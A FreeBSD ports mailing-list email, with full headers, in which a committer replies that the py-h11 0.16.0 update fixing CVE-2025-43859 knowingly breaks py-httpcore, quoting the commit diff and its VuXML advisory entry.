From nobody Tue Apr 29 14:51:20 2025
X-Original-To: dev-commits-ports-all@mlmmj.nyi.freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2610:1c1:1:606c::19:1])
	by mlmmj.nyi.freebsd.org (Postfix) with ESMTP id 4Zn3DR3C1gz5v7s9;
	Tue, 29 Apr 2025 14:51:35 +0000 (UTC)
	(envelope-from bofh@freebsd.org)
Received: from smtp.freebsd.org (smtp.freebsd.org [96.47.72.83])
	(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)
	 key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest SHA256
	 client-signature RSA-PSS (4096 bits) client-digest SHA256)
	(Client CN "smtp.freebsd.org", Issuer "R11" (verified OK))
	by mx1.freebsd.org (Postfix) with ESMTPS id 4Zn3DR12nHz3Y5H;
	Tue, 29 Apr 2025 14:51:35 +0000 (UTC)
	(envelope-from bofh@freebsd.org)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=freebsd.org; s=dkim;
	t=1745938295;
	h=from:from:reply-to:subject:subject:date:date:message-id:message-id:
	 to:to:cc:cc:mime-version:mime-version:content-type:content-type:
	 in-reply-to:in-reply-to:references:references;
	bh=X1CFIJmkaEXLxB0iyHfbjSxiA6ytDTVFKG2sVCIsLF0=;
	b=xXD+3dtZjyRFO9n1Uie1zA//hj/F+gRcYas81IKYqd4ev7jm35ul93boFRyoOTX4rxhDsr
	IM+TW/VSkVvWUowbpG9CXL2hn87KZh67rMBQ/jgryTNifVmQKWduuHuD0yQVwRDVrwT4xa
	K86MCfHsAv5tb4x6DAhT9SrWXfPCJ+cScQlELXKsucte3pMSHRFhL3koWaZj9yk2Xfh1gK
	Tm/Av7wXt+VErWrlTFiHxw5bSfv9cmWpgmfo9/H93iSqoidOm18taUcXO7COjEJcvREwtP
	UW6J12Iym0eHo4WRBuKwUzjna9kAuDcCww+LYv2oCu4nnx4hT/hSH2vburxYbw==
ARC-Seal: i=1; s=dkim; d=freebsd.org; t=1745938295; a=rsa-sha256; cv=none;
	b=oMa+exeDOqNPVxMc53fk0Etn23qZbj57dG8P+txUhKpU8p488Uqjv2dMt1NUEQ4HUgITrX
	A/69QGJ2sp/Ve7wp6Q23sFrwAbUZif0l5/ALk0e1DRpCUMagYz5iU1zSbPVoT/NSsFTy92
	k0pq4GUVotj8aQ0jW+eIdqk7BtUzphTCrq9DSKIzTB5hk+vVbljBHnfE9ykPn8ts07jocN
	Vr6DOSNm/6yMl4kjm/BHUJN8XX7o0Ng1zBTgbC7Z23McNvG/9mFccb1RGKEs7FNgUZnMyd
	hqrUOw8ahM7fbOhAoSvcSnGsgFrnE76Y5FRiaJDGPtVxJiyFFt4bCGJ/SCSTXQ==
ARC-Authentication-Results: i=1;
	mx1.freebsd.org;
	none
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=freebsd.org;
	s=dkim; t=1745938295;
	h=from:from:reply-to:subject:subject:date:date:message-id:message-id:
	 to:to:cc:cc:mime-version:mime-version:content-type:content-type:
	 in-reply-to:in-reply-to:references:references;
	bh=X1CFIJmkaEXLxB0iyHfbjSxiA6ytDTVFKG2sVCIsLF0=;
	b=y1jcCDpx9aaed5iwpR9IRp5b2wu5oN9D/XRM93PuQtpVzn2JaNj9M578pArF0c84Ch5vXS
	7d2vuNXJbfgKd5T3lyr7KqyoqgcUplewKXN4ezVdRfzaolQhRexTdijnypRhXMKdhRbz/g
	isdPun3cNsjNr09L090BrD54j2x3/dCnnHBBoHPBR1uRn7ndfPGEmJSR/4kyH65b0+RD02
	LLt3+d/2vUWO/SuuwcJA+uDRqLTvOeI3WpH9h+zhrRJy3tl2EhqfIsvtYT2XCdX7juHDdu
	lgpu1enfAEL1RXw3gTuR5NfgrOgp05scjBd7AR8o968zHy5VBFpRb0ENyD5TMw==
Received: from mx.bofh.network (mx.bofh.network [IPv6:2a01:4f8:262:4c8e::227])
	(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)
	 key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest SHA256)
	(Client did not present a certificate)
	(Authenticated sender: bofh/mail)
	by smtp.freebsd.org (Postfix) with ESMTPSA id 4Zn3DQ3gQgzNqM;
	Tue, 29 Apr 2025 14:51:34 +0000 (UTC)
	(envelope-from bofh@freebsd.org)
Received: from smtpclient.apple (2a02-a470-6810-0-e822-72fc-e0f9-5af1.fixed6.kpn.net [2a02:a470:6810:0:e822:72fc:e0f9:5af1])
	by mx.bofh.network (OpenSMTPD) with ESMTPSA id 4d88e91a (TLSv1.2:ECDHE-ECDSA-AES256-GCM-SHA384:256:NO);
	Tue, 29 Apr 2025 14:51:31 +0000 (UTC)
Content-Type: multipart/signed;
	boundary="Apple-Mail=_BF2DFE55-3145-494B-B659-BF719D2B59E2";
	protocol="application/pgp-signature";
	micalg=pgp-sha512
List-Id: Commit messages for all branches of the ports repository <dev-commits-ports-all.freebsd.org>
List-Archive: https://lists.freebsd.org/archives/dev-commits-ports-all
List-Help: <mailto:dev-commits-ports-all+help@freebsd.org>
List-Post: <mailto:dev-commits-ports-all@freebsd.org>
List-Subscribe: <mailto:dev-commits-ports-all+subscribe@freebsd.org>
List-Unsubscribe: <mailto:dev-commits-ports-all+unsubscribe@freebsd.org>
X-BeenThere: dev-commits-ports-all@freebsd.org
Sender: owner-dev-commits-ports-all@FreeBSD.org
Mime-Version: 1.0 (Mac OS X Mail 16.0 \(3731.700.6.1.10\))
Subject: Re: git: 72eea8b95e0f - main - net/py-h11: Update version
 0.14.0=>0.16.0
From: Moin Rahman <bofh@freebsd.org>
In-Reply-To: <bed1218e-b8d7-4574-8b86-472c8ddf851a@FreeBSD.org>
Date: Tue, 29 Apr 2025 16:51:20 +0200
Cc: "ports-committers@freebsd.org" <ports-committers@FreeBSD.org>,
 "dev-commits-ports-all@freebsd.org" <dev-commits-ports-all@FreeBSD.org>,
 "dev-commits-ports-main@freebsd.org" <dev-commits-ports-main@FreeBSD.org>
Message-Id: <2C91E232-438D-4EAD-A4AA-9C3FCE4FD416@freebsd.org>
References: <202504291310.53TDATS0020455@gitrepo.freebsd.org>
 <bed1218e-b8d7-4574-8b86-472c8ddf851a@FreeBSD.org>
To: Dima Panov <fluffy@FreeBSD.org>
X-Mailer: Apple Mail (2.3731.700.6.1.10)


--Apple-Mail=_BF2DFE55-3145-494B-B659-BF719D2B59E2
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
	charset=utf-8

Yes. I know that and I have also mentioned this in the commit log.

The maintainer of httpcore has been already notified for the update
off the list.

Kind regards,
Moin

> On Apr 29, 2025, at 16:49, Dima Panov <fluffy@FreeBSD.org> wrote:
>=20
> Hello!
>=20
> This commit breaks www/py-httpcore (and consumers by chain)
>=20
> py311-httpcore-1.0.8 depends on package: py311-h11>=3D0.13<0.15 - not =
found
>=20
> 29.04.2025 16:10, Muhammad Moinur Rahman =D0=BF=D0=B8=D1=88=D0=B5=D1=82:=

>> The branch main has been updated by bofh:
>> URL: =
https://cgit.FreeBSD.org/ports/commit/?id=3D72eea8b95e0f73093217e00f999ff2=
e17e71db5a
>> commit 72eea8b95e0f73093217e00f999ff2e17e71db5a
>> Author:     Muhammad Moinur Rahman <bofh@FreeBSD.org>
>> AuthorDate: 2025-04-29 12:52:42 +0000
>> Commit:     Muhammad Moinur Rahman <bofh@FreeBSD.org>
>> CommitDate: 2025-04-29 13:10:08 +0000
>>     net/py-h11: Update version 0.14.0=3D>0.16.0
>>          - This addresses fix for CVE-2025-43859 =E2=80=94 a critical =
vulnerability
>>       affecting HTTP/1.1 connection handling.
>>          - This update may break ports that depend on older h11 APIs, =
as some
>>       interfaces and behaviors have changed in the new release.
>>          Ports known or suspected to be affected should be tested =
carefully and
>>     updated accordingly. A heads-up will also be sent to ports@.
>>          Quarterly merge should take place after all the downstream =
ports have
>>     been fixed for building.
>>          Security: CVE-2025-43859
>>     Changelog: =
https://github.com/python-hyper/h11/releases/tag/v0.16.0
>>     MFH:    2025Q2
>> ---
>>  net/py-h11/Makefile          |  3 +--
>>  net/py-h11/distinfo          |  6 +++---
>>  security/vuxml/vuln/2025.xml | 29 +++++++++++++++++++++++++++++
>>  3 files changed, 33 insertions(+), 5 deletions(-)
>> diff --git a/net/py-h11/Makefile b/net/py-h11/Makefile
>> index 0772575e8580..ac937d9dc0a4 100644
>> --- a/net/py-h11/Makefile
>> +++ b/net/py-h11/Makefile
>> @@ -1,6 +1,5 @@
>>  PORTNAME=3D h11
>> -PORTVERSION=3D 0.14.0
>> -PORTREVISION=3D 1
>> +DISTVERSION=3D 0.16.0
>>  CATEGORIES=3D net python
>>  MASTER_SITES=3D PYPI
>>  PKGNAMEPREFIX=3D ${PYTHON_PKGNAMEPREFIX}
>> diff --git a/net/py-h11/distinfo b/net/py-h11/distinfo
>> index a002b81548d6..470f83ddf207 100644
>> --- a/net/py-h11/distinfo
>> +++ b/net/py-h11/distinfo
>> @@ -1,3 +1,3 @@
>> -TIMESTAMP =3D 1667662218
>> -SHA256 (h11-0.14.0.tar.gz) =3D =
8f19fbbe99e72420ff35c00b27a34cb9937e902a8b810e2c88300c6f0a3b699d
>> -SIZE (h11-0.14.0.tar.gz) =3D 100418
>> +TIMESTAMP =3D 1745931106
>> +SHA256 (h11-0.16.0.tar.gz) =3D =
4e35b956cf45792e4caa5885e69fba00bdbc6ffafbfa020300e549b208ee5ff1
>> +SIZE (h11-0.16.0.tar.gz) =3D 101250
>> diff --git a/security/vuxml/vuln/2025.xml =
b/security/vuxml/vuln/2025.xml
>> index d5bbf0fb3f3e..46ce1f46c383 100644
>> --- a/security/vuxml/vuln/2025.xml
>> +++ b/security/vuxml/vuln/2025.xml
>> @@ -1,3 +1,32 @@
>> +  <vuln vid=3D"df126e23-24fa-11f0-ab92-f02f7497ecda">
>> +    <topic>h11 accepts some malformed Chunked-Encoding =
bodies</topic>
>> +    <affects>
>> +      <package>
>> +    <name>py39-h11</name>
>> +    <name>py310-h11</name>
>> +    <name>py311-h11</name>
>> +    <name>py312-h11</name>
>> +    <range><lt>0.16.0</lt></range>
>> +      </package>
>> +    </affects>
>> +    <description>
>> + <body xmlns=3D"http://www.w3.org/1999/xhtml">
>> +    <p>h11 reports:</p>
>> +    <blockquote =
cite=3D"https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-=
h8mv-ghfj">
>> +      <p>h11 is a Python implementation of HTTP/1.1. Prior to =
version 0.16.0, a leniency in h11's parsing of line t  erminators in =
chunked-coding message bodies can lead to request smuggling =
vulnerabilities under certain conditions. This issu  e has been patched =
in version 0.16.0. Since exploitation requires the combination of buggy =
h11 with a buggy (reverse) proxy,   fixing either component is =
sufficient to mitigate this issue.</p>
>> + </blockquote>
>> + </body>
>> +    </description>
>> +    <references>
>> +      <cvename>CVE-2025-43859</cvename>
>> +      <url>https://nvd.nist.gov/vuln/detail/CVE-2025-43859</url>
>> +    </references>
>> +    <dates>
>> +      <discovery>2025-04-24</discovery>
>> +      <entry>2025-04-29</entry>
>> +    </dates>
>> +  </vuln>
>> +
>>    <vuln vid=3D"310f5923-211c-11f0-8ca6-6c3be5272acd">
>>      <topic>Grafana -- Authorization bypass in data source proxy =
API</topic>
>>      <affects>
>=20
> --
> Sincerely,
> Dima (fluffy@FreeBSD.org, https://t.me/FluffyBSD, =
@fluffy:matrix-dev.freebsd.org)
> (desktop, kde, x11, office, ports-secteam)@FreeBSD team
>=20


--Apple-Mail=_BF2DFE55-3145-494B-B659-BF719D2B59E2
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename=signature.asc
Content-Type: application/pgp-signature;
	name=signature.asc
Content-Description: Message signed with OpenPGP

-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEETfdREoUGjQZKBS+fvbm1phfAvJEFAmgQ52hfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDRE
Rjc1MTEyODUwNjhEMDY0QTA1MkY5RkJEQjlCNUE2MTdDMEJDOTEACgkQvbm1phfA
vJF/MQ/+M0cN976MwhKQt/5WBkJxPpCI2UNRLTzCgEOnNW0wpVCK7+Exm6WqhqnD
35LYLeoZREGtt2PVka+wwOv2XVprS1EB116HClB0NgVIyOOjCKOSdsaDVgDh7EhO
K4X9T/Ou3gR2R1jPfSWc5lUubsUN5mmAAvgd92YGeGkr71x+T+MOmYx64lH84K3+
p6X/P/96O03cRv/JtUj/CpgYOYi/1i6+bzk+5jvuPOu6ETDgPKClrQfxlRlCi2Lo
zvtG/XiDnkzkfsGdeD8v10AeW7wVE47rPkky5cDtf1TVSGti4fQtHP5AhCDCloam
96AD4dCRQbtPX/SqDsUVY9shWGzJ3fXxPK921dJPJjJ1CaRCV/oFczpoPm3nxUla
vS9Z5fArK9xY8l8WGSRdG5CGBZfiXGlqM1yDdkYMu6WGoT7AM3FG8Cf78I2HIBH2
G6GITS3/fwwLwTY3UJ36a7k4o8FNbqDQV689ET3ldZA8bqzDm70tTh+N6nPQ6Gp2
TwgFyM4WixHGnI24M13rKGg1s9Er2bTF+73RBpWwKtqTWR7gcXt0OMfgDJv3xJTM
pjIeunIwcR1oeX3skt+E8EKGGfI3U4iIiz1eAxBXHaDV/0MnccYv71itvjd23UOB
O3vEdqpaOUQOyyh+mJm7xOVGvyUTmUPtNM+chavgCgBLYW5xtBU=
=xq7c
-----END PGP SIGNATURE-----

--Apple-Mail=_BF2DFE55-3145-494B-B659-BF719D2B59E2--